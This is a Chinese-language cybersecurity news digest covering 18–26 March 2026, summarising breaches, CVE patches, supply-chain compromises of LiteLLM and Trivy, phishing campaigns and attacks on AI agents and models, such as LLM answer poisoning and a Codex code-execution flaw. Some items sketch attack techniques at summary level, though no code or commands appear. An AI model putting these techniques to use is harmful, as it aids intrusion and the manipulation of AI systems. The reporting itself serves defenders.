网络安全日报 2026年03月26日
1、荷兰财政部确认遭受网络攻击
https://www.bleepingcomputer.com/news/security/dutch-ministry-of-finance-discloses-breach-affecting-employees/ 荷兰财政部证实,在一起网络安全事件中其部分内部系统遭到入侵。官方表示,财政部于3月19日收到第三方关于此次泄露的通知,目前仍在对该网络攻击进行调查。初步调查显示,此次事件影响了部分员工。官方声明指出,由税务与海关管理局、海关以及福利部门向公民和企业提供的服务未受影响。目前尚无任何网络犯罪组织或攻击者声称对此次攻击负责。
2、HackerOne受到Navia数据泄露事件的影响
https://www.bleepingcomputer.com/news/security/hackerone-discloses-employee-data-breach-after-navia-hack/s/ 漏洞悬赏平台HackerOne正在通知其数百名员工,称由于其美国福利管理供应商Navia遭到黑客攻击,导致员工数据被窃取。根据HackerOne向缅因州总检察长办公室提交的一份备案文件显示,此次数据泄露事件泄露了287名员工的敏感信息。尽管Navia将此事件标记为数据窃取攻击,但目前尚无网络犯罪组织或勒索组织声称对此负责。
3、Infinite Campus遭受ShinyHunters组织攻击
https://www.bleepingcomputer.com/news/security/infinite-campus-warns-of-breach-after-shinyhunters-claims-data-theft/ Infinite Campus正在向客户发出数据泄露预警,此前该系统遭到了攻击。在发给客户的泄露通知中,Infinite Campus表示,攻击者访问了一名员工的Salesforce账户,导致部分信息泄露,但其中大部分属于公开可查的数据。ShinyHunters组织声称对此负责,并威胁将泄露从Infinite Campus窃取的所有数据。Infinite Cam
4、Russell Cellular疑似发生数据泄露事件
https://www.securitymagazine.com/articles/102183-verizon-retail-customer-database-allegedly-for-sale-by-hackers-63m-customers-at-risk Russell Cellular疑似发生数据泄露事件,可能导致超过630万名客户的记录泄露。目前,一个据称与Russell Cellular关联的数据库已在某黑客论坛上以1200美元的价格挂牌出售,据称包含61GB的数据。截至目前,Russell Cellular尚未证实数据的真实性。该公司表示已获悉客户数据面临的潜在威胁,并正
5、恶意LiteLLM版本与TeamPCP供应链攻击有关联
https://www.freebuf.com/articles/es/474917.html 威胁组织TeamPCP疑似通过Trivy CI/CD漏洞入侵了LiteLLM的1.82.7和1.82.8版本。LiteLLM作为月下载量超9500万次的工具,可帮助开发者通过单一API路由大语言模型请求。这两个恶意版本现已被PyPI下架,其包含多阶段攻击载荷:针对SSH密钥、云数据、钱包和.env文件的凭证窃取工具;通过特权Pod在Kubernetes集群横向移动的工具;以及连接远程服务器获取后续载荷的持久性systemd后门。
6、虚假OpenClaw代币赠礼活动瞄准开发者实施钱包清空骗局
https://www.freebuf.com/news/474948.html 参与OpenClaw项目的软件开发人员正成为一场旨在清空其数字钱包的危险钓鱼活动的最新目标。安全研究公司OX Security最新发现,攻击者利用GitHub自身通知系统,将毫无戒心的用户诱导至欺诈网站。
7、ClawHub漏洞使攻击者可操纵排名使恶意skills登顶
https://www.freebuf.com/articles/ai-security/474931.html 安全研究团队在OpenClaw智能体生态系统的公共skills注册平台ClawHub中发现了一个关键漏洞。该漏洞允许攻击者人为虚增恶意skills的下载量,从而绕过安全检查并操纵搜索排名。通过将受感染的skill推送至榜首,威胁行为者能够对人类用户和自主AI Agent发起大规模供应链攻击。
8、Anthropic为ClaudeCode解锁自动模式允许AI自主选择操作权限
https://www.freebuf.com/articles/ai-security/474832.html Anthropic PBC正在为其广受欢迎的人工智能编码工具Claude Code解除限制,推出名为"自动模式"的新功能,允许AI自主决定可使用哪些操作权限。这一发布加速了AI工具日益自主化的趋势——为了提升生产力,它们无需等待人类批准即可执行更多操作,但这也带来了速度与控制之间的微妙平衡。
9、谷歌云发布AI驱动安全战略:整合Wiz技术并升级威胁情报能力
https://siliconangle.com/2026/03/23/google-cloud-unveils-agentic-ai-security-strategy-wiz-integration-threat-intelligence-upgrades/ 谷歌云扩展AI安全产品,整合Wiz技术构建多云安全方案,推出智能SOC和定制Agent应对自动化威胁,强化AI防护与情报能力,提升响应速度与精准防御。
10、QNAP修复Pwn2Own Ireland 2025演示的四个漏洞
https://securityaffairs.com/189871/security/qnap-fixed-four-vulnerabilities-demonstrated-at-pwn2own-ireland-2025.html QNAP修复了Pwn2Own Ireland 2025上演示的四个高危漏洞(CVE-2025-62843至62846),涉及权限提升、数据泄露和系统控制风险,厂商已发布补丁,强调及时更新和强化安全实践的重要性。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月25日
1、利比亚炼油厂遭受恶意软件攻击
https://www.security.com/threat-intelligence/asyncrat-libya-oil-cyberattack 在2025年11月至2026年2月期间,利比亚多家机构遭遇了一系列攻击,受害者包括一家炼油厂、一家电信机构和一家国家级政府部门。在这些攻击中攻击者投放了AsyncRAT后门,这是一款公开可用的后门工具,此前曾多次被APT组织所使用。这些攻击活动的初始感染媒介很可能是鱼叉式钓鱼邮件,研究人员在受感染的设备中发现了利用利比亚时政热点的诱饵文档。
2、Cloud Software Group发布紧急安全补丁
https://cybersecuritynews.com/netscaler-adc-and-gateway-vulnerabilities/ Cloud Software Group针对NetScaler ADC(原Citrix ADC)和NetScaler Gateway(原Citrix Gateway)发布了紧急安全补丁,以修复两个安全漏洞。这些漏洞可能允许未经身份验证的远程攻击者入侵受影响的系统。CVE-2026-3055是SAML IDP越界读取漏洞,CVSSv4.0评分为9.3。该漏洞源于输入验证不足,导致内存过度读取。第二个漏洞CVE-2026-4368的CVSSv4.0评分
3、马自达披露一起数据泄露事件
https://www.bleepingcomputer.com/news/security/mazda-discloses-security-breach-exposing-employee-and-partner-data/ 马自达汽车株式会社(Mazda)称,在去年12月检测到的一起安全事件中,其员工及业务合作伙伴的信息已遭到泄露。据公司称,攻击者利用了一个与泰国采购零件仓库管理相关的系统漏洞。该系统不包含任何客户数据,且此次泄露的范围较小,共涉及692条记录。调查显示,潜在泄露的信息包括以下数据类型:用户ID、姓名全称、电子邮件地址、公司名称、业务合作伙伴ID。马自达表示目前尚未监测
4、全球逾51.1万台停止更新的微软IIS服务器暴露在互联网上
https://www.freebuf.com/articles/network/474695.html 2026年3月23日,Shadowserver基金会在例行网络扫描中发现超过51.1万台已终止支持(EOL)的微软Internet Information Services(IIS)服务器仍保持互联网连接。这些过时系统形成了巨大的攻击面,由于不再接收标准安全更新,给全球组织机构带来严重安全风险。
5、安全公司开发的AI Agent两小时得到麦肯锡聊天机器人的完全读写权限
https://www.freebuf.com/articles/web/474646.html 安全研究人员表示,一款 AI 攻击智能体在两小时内攻破了麦肯锡的内部 AI 平台 ,并获得聊天机器人系统的完整读写权限。这一事件再次表明, 智能体 AI(Agentic AI)正迅速成为执行网络攻击的高效工具,甚至可以被用于攻击其他 AI 系统。
6、APT组织通过攻击RDP服务器部署恶意载荷并建立持久化访问
https://www.freebuf.com/articles/ics-articles/474772.html 全球最危险的国家级黑客组织之一正在积极针对关键基础设施、国防机构和政府部门的远程桌面协议(RDP)服务器展开攻击。该威胁行为者被命名为APT-C-13(Sandworm/APT44/Seashell Blizzard/Voodoo Bear),自2009年起持续开展网络攻击活动。其最新攻击行动标志着战略的重大转变——从破坏性的一次性打击转向旨在长期窃取情报的隐蔽渗透。
7、美国FCC扩大进口禁令外国产新型路由器被列入“覆盖清单”
https://www.secrss.com/articles/88735 美国时间3月23日,美国联邦通信委员会(Federal Communications Commission, FCC)宣布正式将外国生产的消费者路由器列入其“覆盖清单”(Covered List)。这一动作意味着,除获得特定豁免的型号外,所有新款外国产家用路由器将被禁止进口美国。
8、新型木马绕过Chrome安全机制,无注入窃取浏览器主密钥
https://www.secrss.com/articles/88724 一款名为VoidStealer的信息窃取恶意软件,近期被曝出采用了全新的手法,绕过了谷歌Chrome浏览器去年引入的“应用绑定加密”(ABE)保护机制。这种新方法不依赖传统的代码注入,而是通过调试器和硬件断点,直接从浏览器内存中“钓”出用于解密敏感数据的主密钥。
9、黑客使用假简历窃取企业凭证并部署加密货币挖矿程序
https://thehackernews.com/2026/03/hackers-use-fake-resumes-to-steal.html 一场正在进行的钓鱼活动正针对法语企业环境,使用假简历诱骗,导致部署了加密货币挖矿程序和信息窃取程序。该活动使用高度混淆的 VBScript 文件,伪装成简历/履历文档,通过钓鱼邮件进行传播。
10、流行的LiteLLM PyPI软件包被植入后门以窃取凭证和认证令牌
https://www.bleepingcomputer.com/news/security/popular-litellm-pypi-package-compromised-in-teampcp-supply-chain-attack/ TeamPCP 黑客组织继续其供应链攻击,现在攻破了在 PyPI 上非常受欢迎的“LiteLLM”Python 软件包,并声称在此次攻击中从数十万台设备中窃取了数据。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月24日
1、攻击者对阿根廷司法系统进行网络钓鱼攻击
https://www.pointwild.com/threat-intelligence/covert-rat-phishing-campaign/ 研究人员发现一起网络钓鱼活动,该活动采用了一套精心策划的多阶段感染链,旨在投放一种隐蔽的远控木马。此次攻击将鱼叉式钓鱼与极具迷惑性的司法内容相结合,攻击者利用涉及“预防性拘留审查”的阿根廷联邦法院真实裁决书作为诱饵,最终投放一个基于Rust语言编写的远控木马,以实现在目标环境中隐蔽且持久的访问。此次攻击活动主要针对阿根廷的司法系统,涵盖了联邦法院及司法从业人员、司法相关的政府机构、学术机构及法律倡导组织。
2、攻击者滥用微软Azure Monitor告警功能发送钓鱼邮件
https://www.bleepingcomputer.com/news/security/microsoft-azure-monitor-alerts-abused-in-callback-phishing-campaigns/ Azure Monitor是微软提供的云端监控服务,用于收集和分析来自Azure资源、应用及基础设施的数据。用户可以利用它追踪性能、接收账单变动通知、检测故障以及根据各种条件触发告警。然而,近期该平台正遭到攻击者滥用。攻击者通过该平台发送伪造的“回拨钓鱼”邮件,冒充微软安全团队警告用户账户出现了未授权扣费。在过去一个月中,大量用户报告收到Azure Monito
3、LAPSUS$组织声称入侵阿斯利康
https://cybersecuritynews.com/astrazeneca-data-breach/ LAPSUS$组织声称对跨国制药与生物技术巨头阿斯利康(AstraZeneca)的一起重大数据泄露事件负责。目前,攻击组织正试图出售一份经过压缩的3GB内部数据转储包。LAPSUS$正试图引诱潜在买家通过加密通信软件与其联系以商讨购买事宜。目前尚未有完整的泄露数据被免费公开,这表明该组织此次的主要动机是通过直接交易获取经济利益,而非立即进行公开勒索。截至2026年3月20日,阿斯利康尚未对此事件发表评论,也未发布官方声明。
4、廉价KVM设备可能使企业网络面临远程入侵风险
https://www.csoonline.com/article/4147874/that-cheap-kvm-device-could-expose-your-network-to-remote-compromise.html 研究发现四款廉价IP-KVM设备存在九项高危漏洞,包括未认证命令注入和弱认证防御,可导致完全接管。这些设备广泛用于企业远程管理,攻击者可借此获得BIOS级物理访问权限,绕过所有安全防护。建议隔离设备、启用双因素认证并审计网络部署。
5、美加德联合捣毁制造破纪录30Tbps DDoS的IoT僵尸网络基础设施
https://cybersecuritynews.com/authorities-disrupts-iot-botnet/ 美加德联合摧毁四大IoT僵尸网络,感染超300万台设备,曾发起30Tbps DDoS攻击。犯罪团伙利用漏洞设备组建“网络犯罪即服务”平台,主要针对关键基础设施。国际执法行动查封服务器并切断通信,获科技企业支持。
6、CNCERT发布OpenClaw安全使用实践指南
https://www.secrss.com/articles/88689 为帮助用户安全使用OpenClaw,CNCERT会同中国网络空间安全协会组织国内相关厂商共同研究,面向普通用户、企业用户、云服务商以及技术开发者/爱好者,提出以下安全防护建议。
7、Langflow存在远程代码执行漏洞安全风险
https://www.secrss.com/articles/88686 近日,奇安信CERT监测到官方修复Langflow 远程代码执行漏洞(CVE-2026-33017),该漏洞存在于 Langflow 的 POST /api/v1/build_public_tmp/{flow_id}/flow 端点中。该端点设计用于无需认证即可构建公共流程,但在处理请求时存在一个关键缺陷:当请求中包含可选的 data 参数时,端点会直接使用攻击者提供的流程数据,而非从数据库中加载已存储的流程数据。这些攻击者控制的流程数据可以包含任意 Python 代码,在流程构建过程中通过 exec() 函数直接执
8、黑客滥用 VS Code 自动运行任务来部署 StoatWaffle 恶意软件
https://thehackernews.com/2026/03/north-korean-hackers-abuse-vs-code-auto.html 利用 VS Code 的 "tasks.json" 分发恶意软件是一种自 2025 年 12 月以来威胁行为者采用的新策略,攻击利用 "runOn: folderOpen" 选项,在 VS Code 中打开项目文件夹中的任何文件时自动触发其执行。
9、黑客利用高危漏洞劫持未打补丁的Quest KACE SMA系统
https://thehackernews.com/2026/03/hackers-exploit-cve-2025-32975-cvss-100.html 攻击者疑似正在利用影响 Quest KACE 系统管理设备(SMA)的最高严重性安全漏洞,根据 Arctic Wolf 的说法,该网络安全公司表示,它在 2026 年 3 月 9 日那一周开始观察到恶意活动,这些活动与在互联网上暴露的未打补丁的 SMA 系统上利用 CVE-2025-32975 漏洞的行为一致。目前尚不清楚攻击的最终目标是什么。
10、FBI警告称俄黑客在大规模网络钓鱼攻击中针对Signal和WhatsApp
https://thehackernews.com/2026/03/fbi-warns-russian-hackers-target-signal.html 美国网络安全和基础设施安全局(CISA)和联邦调查局(FBI)周五表示,与俄罗斯情报机构有关联的威胁行为者正在开展钓鱼活动,以窃取商业通信应用(如 WhatsApp 和 Signal)的控制权,从而夺取具有重要情报价值个人的账户。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月23日
1、APT28利用Zimbra协作平台中的XSS漏洞进行攻击
https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/ 研究人员发现一起针对性的网络钓鱼攻击活动,该活动利用Zimbra协作平台中的XSS漏洞,入侵了一家乌克兰政府实体。该钓鱼邮件中没有恶意附件,没有可疑链接,也没有宏代码。整个攻击链完全寄生在单封邮件的HTML正文中。攻击者利用一封经过社会工程学设计的“实习咨询”邮件,将混淆后的JavaScript载荷直接嵌入邮件正文。当受害者在存在漏洞的Zimbra Webmail会话中打开该邮件时,便会触发CVE-2025-66376漏洞。恶意脚本
2、研究人员发现新型恶意安卓软件Perseus
https://www.threatfabric.com/blogs/perseus-dto-malware-that-takes-notes 研究人员识别出一种正在活跃传播的新型恶意安卓软件,该恶意软件家族被命名为Perseus,是在Cerberus和Phoenix等早期恶意代码家族的代码基础上进行构建及更改的。该恶意软件通过基于无障碍服务的远程会话,能够对受感染设备进行实时监控和精确交互,实现完全的设备接管。其目标覆盖多个地区,重点针对土耳其和意大利。除了传统的凭据窃取外,Perseus还会监控用户笔记,表明其重点在于提取高价值的个人或财务信息。
3、Payload勒索组织声称入侵巴林皇家医院
https://securityaffairs.com/189467/cyber-crime/payload-ransomware-claims-the-hack-of-royal-bahrain-hospital.html Payload勒索组织声称已入侵巴林皇家医院,并窃取了110GB的数据。该勒索组织已将该医疗机构列入其Tor数据泄露网站,并发布了据称被入侵系统的截图作为攻击证明。该组织威胁称,如果到3月23日仍未支付赎金,将公开所有被盗数据。
4、研究人员发现恶意Python包pyronut
https://www.endorlabs.com/learn/malicious-pyronut-package-backdoors-telegram-bots-with-remote-code-execution 研究人员发现恶意Python软件包pyronut冒充热门的Telegram API框架pyrogram,针对Telegram bot开发者进行攻击。这是一种“恶意分支”行为,即对合法项目进行木马化复制,并极有可能通过社会工程学或社区推广进行传播。pyronut仅发布过三个版本且全部携带恶意代码。这些版本于2026年3月18日当天发布、被识别并被隔离。考虑到攻击窗口仅持续了几个小
5、Ubiquiti修复UniFi网络应用中的高危漏洞
https://www.bleepingcomputer.com/news/security/ubiquiti-warns-of-unifi-flaw-that-may-enable-account-takeover/ Ubiquiti已修复其UniFi Network Application中的两个安全漏洞,其中包括一个可能允许攻击者接管用户账户的高危漏洞。CVE-2026-22557允许未经授权的攻击者利用路径遍历漏洞访问目标设备上的文件。这种攻击复杂度低,且无需用户交互,最终可能导致用户账户被劫持。第二个漏洞是一个经过身份验证的NoSQL注入漏洞,拥有网络访问权限的恶意行为者在通过身份
6、Oracle发布安全更新修复CVE-2026-21992
https://www.bleepingcomputer.com/news/security/oracle-pushes-emergency-fix-for-critical-identity-manager-rce-flaw/ Oracle发布了一项带外安全更新,以修复CVE-2026-21992(CVSS v3.1评分9.8)安全漏洞。该漏洞存在于Identity Manager和Web Services Manager中,可导致未经身份验证的远程代码执行。Oracle表示该漏洞的利用复杂度低,可通过HTTP进行远程利用,且无需身份验证或用户交互,这增加了暴露在公网上的服务器被攻击的风险
7、漏洞扫描工具Trivy遭受供应链攻击
https://www.bleepingcomputer.com/news/security/trivy-vulnerability-scanner-breach-pushed-infostealer-via-github-actions/ 漏洞扫描工具Trivy遭到TeamPCP攻击组织的供应链攻击。攻击者通过官方发布版本和GitHub Actions分发了用于窃取凭据的恶意软件。安全研究员首先警告称Trivy 0.69.4版本被植入了后门,恶意的容器镜像和GitHub发行版已被推送给用户。后续分析确定,攻击影响了多个GitHub Actions,几乎trivy-action仓库的所有版本
8、加密货币礼品卡平台Bitrefill遭受攻击
https://www.bleepingcomputer.com/news/security/bitrefill-blames-north-korean-lazarus-group-for-cyberattack/ 加密货币礼品卡平台Bitrefill表示,本月初其遭受的网络攻击极有可能是由来自朝鲜的BlueNoroff组织发起的。在调查过程中,该平台观察到了与此前归因于该组织攻击高度相似的指标,包括攻击战术、恶意软件、IP地址和电子邮件地址。约有18500条包含客户电子邮件地址、IP地址和加密货币支付地址的购买记录遭到泄露,其中有1000笔交易还涉及客户姓名。虽然这些信息是以加密形式存储的
9、超过7500个Magento网站遭大规模攻击
https://www.securityweek.com/thousands-of-magento-sites-hit-in-ongoing-defacement-campaign/ 研究人员表示,在过去三周内超过7500个Magento网站遭受大规模的黑页攻击。在这场攻击中,攻击者直接在受影响的基础设施上部署了纯文本形式的黑页文件,涉及超过15000个主机名。与此同时,安全公司报告了Magento和Adobe Commerce的REST API中存在一个安全漏洞(被命名为PolyShell),攻击者可利用该漏洞在无需身份验证的情况下向任何商店上传可执行文件。尽管该漏洞目前尚未发现被大规模地
10、加拿大电信巨头Telus遭 ShinyHunters 入侵,1PB 数据恐泄露
https://hackread.com/shinyhunters-1-petabyte-data-breach-telus-digital/ 加拿大电信巨头Telus遭勒索团伙ShinyHunters入侵,700TB至1PB敏感数据泄露,含客户录音、员工档案等。该团伙多次攻击国际企业,威胁公开数据。Telus业务未中断,正通知受影响客户。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月20日
1、海莲花组织针对我国重点单位人员进行钓鱼攻击
https://www.antiy.cn/research/notice&report/research_report/APT-TOCS_Analysis_202603.html& 2025下半年起,安天CERT持续发现海莲花APT组织疑似继续通过鱼叉式攻击邮件向我国重点单位的核心工作人员投递内含镜像文件的压缩包钓鱼文件,受害者大多属于与国防、政治、外交、智库等领域相关的部门机构。
2、Interlock勒索组织利用思科防火墙零日漏洞发动攻击
https://www.bleepingcomputer.com/news/security/interlock-ransomware-exploited-secure-fmc-flaw-in-zero-day-attacks-since-january/ Interlock勒索组织自1月底以来,一直利用思科安全防火墙管理中心软件中的一个远程代码执行漏洞发动零日攻击。思科于3月4日修复了该安全漏洞(CVE-2026-20131),并警告称该漏洞允许未经身份验证的攻击者在未修补的设备上,远程以root权限执行任意Java代码。
3、ConnectWise警告ScreenConnect存在加密漏洞
https://www.bleepingcomputer.com/news/security/connectwise-patches-new-flaw-allowing-screenconnect-hijacking/ ConnectWise正在向ScreenConnect用户发出预警,称该平台存在一个加密签名验证漏洞,可能导致未经授权的访问及权限提升。该漏洞追踪编号为CVE-2026-3564,影响26.1版本之前的所有ScreenConnect实例。ConnectWise已通过加强机器密钥保护(包括加密存储和改进处理逻辑)修复了此问题,受影响用户应更新至ScreenConnect 26.
4、身份保护公司Aura证实一起数据泄露事件
https://www.bleepingcomputer.com/news/security/aura-confirms-data-breach-exposing-900-000-marketing-contacts/ 身份保护公司Aura已证实,一名未经授权的第三方获取了近90万条包含客户姓名和电子邮件地址的记录。该公司表示,此次事件是由针对其一名员工的语音钓鱼攻击引起的,导致20000名现任客户和15000名原客户的敏感数据泄露。ShinyHunters组织在其数据勒索网站上声称对此次攻击负责,并表示他们窃取了12GB的文件,其中包含客户的个人身份信息以及公司内部数据。Aura拒绝就Sh
5、DarkSword iOS漏洞利用套件利用6个漏洞(含0Day)实现设备完全控制
https://www.freebuf.com/articles/endpoint/474206.html 根据谷歌威胁情报小组(GTIG)、iVerify和Lookout的报告,自2025年11月以来,多个威胁组织正在使用一种针对苹果iOS设备的新型漏洞利用套件窃取敏感数据。该套件代号为DarkSword,GTIG确认多家商业监控供应商和疑似国家背景的黑客组织已在针对沙特阿拉伯、土耳其、马来西亚和乌克兰的不同攻击活动中使用该全链漏洞利用套件。
6、新型安卓银行木马Perseus监控笔记应用以提取敏感数据
https://thehackernews.com/2026/03/new-perseus-android-banking-malware.html 网络安全研究人员披露了一种名为 Perseus 的新型安卓恶意软件家族,该恶意软件正在野外积极传播,旨在进行设备接管(DTO)和金融欺诈,Perseus 基于 Cerberus 和 Phoenix 的基础构建,同时进化为一个“更灵活和强大的平台”,通过钓鱼网站分发的投递器应用程序来攻击安卓设备。
7、工信部发布关于防范Windows RDS权限提升高危漏洞风险提示
https://www.secrss.com/articles/88628 近日,工业和信息化部网络安全威胁和漏洞信息共享平台(NVDB)监测发现,Windows远程桌面服务(RDS)存在权限提升高危漏洞,已被用于网络攻击。
8、金融服务提供商Marquis证实遭受勒索软件攻击
https://www.bleepingcomputer.com/news/security/marquis-ransomware-gang-stole-data-of-672-000-people-in-2025-cyberattack/ 总部位于德克萨斯州的金融服务提供商Marquis本周透露,2025年8月发生的一场勒索软件攻击不仅导致超过67万个人数据被盗,还造成全美74家银行的业务中断。今年1月,Marquis将此次勒索软件攻击归咎于SonicWall在9月17日披露的一起安全违规事件。当时SonicWall曾警告客户重置MySonicWall账户凭据。今年2月,Marquis对S
9、Nordstrom客户接收到来自官方邮箱的欺诈邮件
https://www.bleepingcomputer.com/news/security/nordstroms-email-system-abused-to-send-crypto-scams-to-customers/ 高端连锁百货公司Nordstrom的客户近日收到了来自该公司官方合法邮箱的欺诈邮件。这些邮件借促销之名进行加密货币诈骗。欺诈邮件声称,收件人在接下来的两小时内向特定的钱包地址存入加密货币,即可获得双倍返还。多名客户在社交媒体上反映收到了此类邮件。邮件确实是从官方邮箱地址发出的,该地址通常用于发送营销、销售和促销信息。这表明Nordstrom的系统遭到了安全入侵。Nord
10、网络攻击导致俄罗斯彼尔姆市停车缴费系统瘫痪
https://therecord.media/cyberattack-russia-parking-system 俄罗斯城市彼尔姆在经历上周的网络攻击后,现已恢复其停车缴费系统。此前,该攻击导致服务下线,迫使全市临时实行了数日的免费停车。彼尔姆市当局确认,系统现已全面恢复运行,所有支付方式均已恢复正常。据当地官员称,此次服务中断是由大规模分布式拒绝服务攻击引起的,攻击流量压垮了该市的自动化停车缴费基础设施。目前尚无攻击组织声称对此负责。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月19日
1、研究人员发现多个恶意的PHP Composer软件包
https://socket.dev/blog/6-malicious-packagist-themes-ship-trojanized-jquery 研究人员在PHP的Packagist仓库中识别出了6个发布在ophimcms命名空间下的恶意软件包。这些包模仿了OphimCMS的命名规范,这是一款专门用于电影流媒体网站的越南语Laravel开源内容管理系统。这6个软件包均携带了被植入恶意代码的JavaScript资源,主要伪装成合法的jQuery库。其恶意行为包括流量劫持、数据外泄、广告注入等。截至报告发布时,这些软件包在Packagist上仍处于活跃状态。研究人员已向Packagist安
2、LeakNet勒索组织利用ClickFix技术传播恶意文件
https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat 研究人员发现,LeakNet勒索组织正在利用ClickFix技术(一种通过伪造错误提示,诱导用户手动运行恶意命令的社会工程学手段)通过被攻击的合法网站传播恶意文件。研究人员识别出一种基于Deno构建的分阶段C2加载器,该加载器主要在内存中执行载荷。在所有已确认的LeakNet相关事件中,研究人员发现攻击者会进行相同的后期渗透行为。
3、苹果发布首个后台安全改进更新以修复WebKit漏洞
https://www.bleepingcomputer.com/news/security/apple-pushes-first-background-security-improvements-update-to-fix-webkit-flaw/ 苹果公司发布了首个后台安全改进更新,旨在修复iPhone、iPad和Mac上一个编号为CVE-2026-20643的WebKit漏洞,且无需进行完整的操作系统升级。这是苹果首次通过其全新的后台安全改进功能推送安全修复程序。该功能用于在正常软件更新周期之外,交付小型的带外补丁。CVE-2026-20643漏洞允许恶意网页内容绕过浏览器的同源策略。
4、Ubuntu桌面系统漏洞可使攻击者获取完整 root 权限
https://www.freebuf.com/articles/system/474012.html Ubuntu Desktop 24.04 及后续版本默认安装中存在本地提权(LPE)漏洞(CVE-2026-3888),允许非特权本地攻击者获取完整 root 权限。该漏洞由 Qualys 威胁研究团队发现,源于 snap-confine 与 systemd-tmpfiles 两个标准系统组件间的非预期交互,由于这两个组件深度集成于 Ubuntu 默认部署中,使得该漏洞尤为危险。
5、攻击者利用微软环境远程擦除数万台医疗科技巨头史赛克员工设备
https://securityaffairs.com/189535/hacking/attack-on-stryker-s-microsoft-environment-wiped-employee-devices-without-malware.html 医疗科技巨头史赛克遭亲巴黑客组织Handala攻击,8万台设备被远程擦除,50TB数据被盗。攻击者利用微软Intune入侵,医疗设备未受影响。该组织疑为伊朗支持,擅长破坏性攻击。
6、Angular XSS漏洞致数千个Web应用面临跨站脚本攻击风险
https://cybersecuritynews.com/angular-xss-vulnerability-xss-attacks/ Angular高危XSS漏洞(CVE-2026-32635)影响@angular/compiler和@angular/core,因i18n处理敏感属性时绕过安全净化。攻击者可劫持会话、窃取数据或执行未授权操作。建议升级至修复版本或严格净化用户输入绑定数据。
7、从Windows转向macOS:ClickFix攻击利用ChatGPT诱饵升级战术
https://securityaffairs.com/189542/cyber-crime/from-windows-to-macos-clickfix-attacks-shift-tactics-with-chatgpt-based-lures.html ClickFix攻击转向macOS,利用ChatGPT诱饵升级社会工程手段,部署MacSync等窃取程序,从简单终端欺骗发展为模块化内存攻击,窃取敏感数据并绕过防护机制,威胁日益隐蔽高效。
8、英伟达NemoClaw平台为OpenClaw Agent提供安全运行环境
https://www.freebuf.com/articles/ai-security/473903.html 自OpenClaw成为Agentic AI领域最受关注的技术以来,短短数周内,其企业级应用安全性不足的问题持续引发担忧。在英伟达GPU技术大会(GTC)上,CEO黄仁勋发布了解决方案:NemoClaw平台。
9、OpenAI Codex严重未授权代码执行漏洞可能导致被攻击
https://www.secrss.com/articles/88579 DARKNAVY 近日发现并报告了 OpenAI Codex 桌面端中一处严重的未授权代码执行漏洞。该漏洞绕过了 Codex 的默认权限限制,攻击者仅需诱导用户打开恶意构造的代码仓库/文件夹,即可在无需用户任何授权的情况下静默触发代码执行。该漏洞目前尚未修复,且社区已出现第三方复现案例,建议广大开发者与企业用户保持警惕,切勿随意打开未确认来源的代码仓库,以防源码等关键数据资产泄露。
10、Telnetd被发现严重漏洞可用于未授权远程获取Root权限
https://thehackernews.com/2026/03/critical-telnetd-flaw-cve-2026-32746.html 网络安全研究人员披露了一个影响 GNU InetUtils telnet 守护进程(telnetd)的关键安全漏洞,未经身份验证的远程攻击者可以利用该漏洞以提升的权限执行任意代码。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2026年03月18日
1、“AI换脸”诈骗案曝光:5万多条动态人脸视频被批量合成
https://www.secrss.com/articles/88558 近日,青岛胶州市公安局破获一起利用非法获得公民个人信息进行AI换脸的诈骗案,查获利用AI技术合成,带有“摇摇头”“眨眨眼”的动态人脸视频5万多条。3月16日,中央广播电视总台新闻频道《法治在线》栏目对此案进行报道。
2、国家安全部:“龙虾”(OpenClaw)安全养殖手册
https://www.secrss.com/articles/88543 OpenClaw(昵称“龙虾”)是一款开源AI智能体工具,上线不久便迅速成长为2026年度现象级“开源奇迹”。不少用户从付费安装“龙虾”,到付费卸载“龙虾”,养“龙虾”正在成为一场智能体的狂欢。但火热的“龙虾”在创新改变生活的同时,也存在原生风险。小安特别提示,广大用户要理性辨别、规范使用,以积极的心态和慎重的执行拥抱人工智能时代,让“龙虾”成为遵规守纪、产能高效的“数字员工”。
3、谷歌2025年发放了近1.2亿元漏洞赏金,单漏洞最高奖励170万元
https://www.secrss.com/articles/88529 谷歌透露,2025年通过漏洞奖励计划(VRP)向747名报告安全漏洞的安全研究人员支付了超过1700万美元(约合人民币1.17亿元),单个漏洞报告最高奖励为25万美元(约合人民币172万元)。
4、3·15晚会披露AI大模型遭“投毒”,让客户的产品榜上有名
https://www.secrss.com/articles/88520 按照业内人士爆料,记者在多个网络平台查询搜索到了一项名为GEO的业务,这些从事该项业务的服务商号称,用户只需支付相应的费用,它就能在各大主流AI大模型里,让客户的产品榜上有名;让客户的商品广告,成为AI模型给出的“标准答案”。
5、Ally WordPress插件高危SQL注入漏洞威胁40万个网站
